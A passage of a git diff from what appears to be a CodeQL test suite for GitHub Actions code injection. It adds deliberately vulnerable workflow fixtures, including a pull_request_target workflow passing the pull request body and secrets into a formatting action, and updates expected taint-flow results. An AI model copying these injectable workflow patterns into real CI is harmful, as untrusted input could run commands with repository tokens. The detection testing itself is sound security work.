'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml new file mode 100644 index 000000000000..9be36a158fe8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml @@ -0,0 +1,36 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ultralytics/actions@main + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" + body: ${{ github.event.pull_request.body }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index b2afe0577aab..c2bd8a1bc62d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -8,16 +8,12 @@ edges | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -53,7 +49,7 @@ edges | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | -| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | @@ -61,6 +57,11 @@ edges | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | @@ -98,7 +99,7 @@ edges | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -211,6 +212,7 @@ edges | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | semmle.label | input body | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | semmle.label | inputs.body | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | semmle.label | github.head_ref \|\| github.ref | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -336,6 +331,16 @@ nodes | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | @@ -621,6 +626,7 @@ nodes | .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | 